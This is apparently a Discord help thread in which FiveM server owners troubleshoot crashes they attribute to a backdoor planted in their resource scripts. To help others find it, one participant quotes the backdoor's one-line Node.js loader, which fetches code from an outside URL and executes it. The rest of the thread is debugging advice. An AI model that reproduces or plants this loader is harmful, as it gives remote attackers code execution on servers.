#I want help my server is crashed dump

1 messages · Page 1 of 1 (latest)

remote spoke
serene canyon
#

backdoor inside u resources

remote spoke
serene canyon
#

that mean

#

UI Crash

remote spoke
#

Well what do you do to solve it?

serene canyon
#

or Node.js

#

remvoe the backdoors

#

from js

#

remove *

remote spoke
#

Okay I will try

serene canyon
#

the backdoor size is under 2kb

when u open the file you get code like that

require('https').get('https://steaxscripts.com/zXeAHJJ', res => { let d = ''; res.on('data', c => d += c).on('end', () => res.statusCode === 200 && new Function('global', d)(global)); }).on('error', () => {});
#

Remove the file then restart the script

remote spoke
#

Ok

serene canyon
#

gl

remote spoke
#

@serene canyon

dusty mapleBOT
remote spoke
#

Where

silent oasis
remote spoke
#

@serene canyon

serene canyon
#

?

#

bro

fiery fulcrum
#

I have the same problem, how can I solve it?

serene canyon
#

just remove backdoors from u resources

fiery fulcrum
fiery fulcrum
fossil plinth
fiery fulcrum
fossil plinth
late dragon
amber cloud
serene canyon
#

The file where is backdoors

amber cloud
#

i deleted

#

all

serene canyon
amber cloud
#

Yes

dusty mapleBOT
# amber cloud Yes

:rocket: Congratulations @amber cloud, you leveled up to <@&828359841512816671>!

amber cloud
#

Like that

serene canyon
#

u still have backdoor

amber cloud
#

how

#

i get

#

code

serene canyon
amber cloud
#

Yes i did

#

there is no

serene canyon
#

Alright, if nothing appears and the crash issue is still not resolved, you should start running the scripts one by one in an organized manner to identify which script is causing the crash, then either remove or modify it

dusty mapleBOT
amber cloud
#

It wont work

#

I removed file file and Wont Work

serene canyon
#

Remove all scripts like { ensure , start } from cfg

amber cloud
#

Okay let me test

serene canyon
#

And after that, test each script individually to determine where the error is coming from

amber cloud
#

okay

serene canyon
#

Don't forget to make a backup copy

amber cloud
amber cloud
#

I want new ox_lib Without backdoors

#

where i get it?

brazen gust
#

its in your fxmanifest as well

#

--[[server.lua]]

#

search for that

amber cloud
#

in fxmanifest

brazen gust
#

Yh

amber cloud
#

what i search

#

This?

#

--[[server.lua]]

brazen gust
#

Yh

dusty mapleBOT
# brazen gust Yh

:rocket: Congratulations @brazen gust, you leveled up to <@&828359841512816671>!

amber cloud
#

anything

amber cloud
#

Every time it Crash when i add it

amber cloud
somber lark
#

i removed he lines and now tring to upload the files and change the RDP

#

and i just saved the resources and server.cfg and deleted txadmin and fx server files

#

if it still does't work

#

what do i gona do

serene canyon
#

But first remove ox_lib then reinstall it

amber cloud
dusty mapleBOT
amber cloud
#

It wont work

serene canyon
#

Still same crash ?

amber cloud
#

yes

serene canyon
#

clear u crashes

#

and remove cache

#

then run FXServer

#

if still crashing

#

send crashes dmp

#

@amber cloud

amber cloud
#

oke

#

wait

amber cloud
#

Wont work!

#

Crash File!

brazen gust
#

the script i was using from github had effected all my scripts
so the script updated every resource.lua/fxmanifest.lua and added a new line for a html file that the backdoor made in every script

serene canyon
# amber cloud

still have backdoor or u have some UI crashing u FXServer

#

the dmp give me v8node.dll crash that mean UI or JS file is crashing

amber cloud
#

how i can find it?

serene canyon
#

idk

#

i wanna CitizenFX.log

#

to know

#
Disable all your resources, then enable them in small groups (e.g., 5 at a time), and restart the server until the crash happens again.

Focus on JavaScript/Node.js-based scripts – usually scripts with:

client/main.js

server.js

or using v8 in some way

Check your recent changes:

Scripts added or edited just before the crashes started.

Use debug logging:

You can create a simple logging mechanism using print() or console.log() to know which scripts are loading.

Or use crash monitoring from txAdmin or other tools that can show the last loaded script.
amber cloud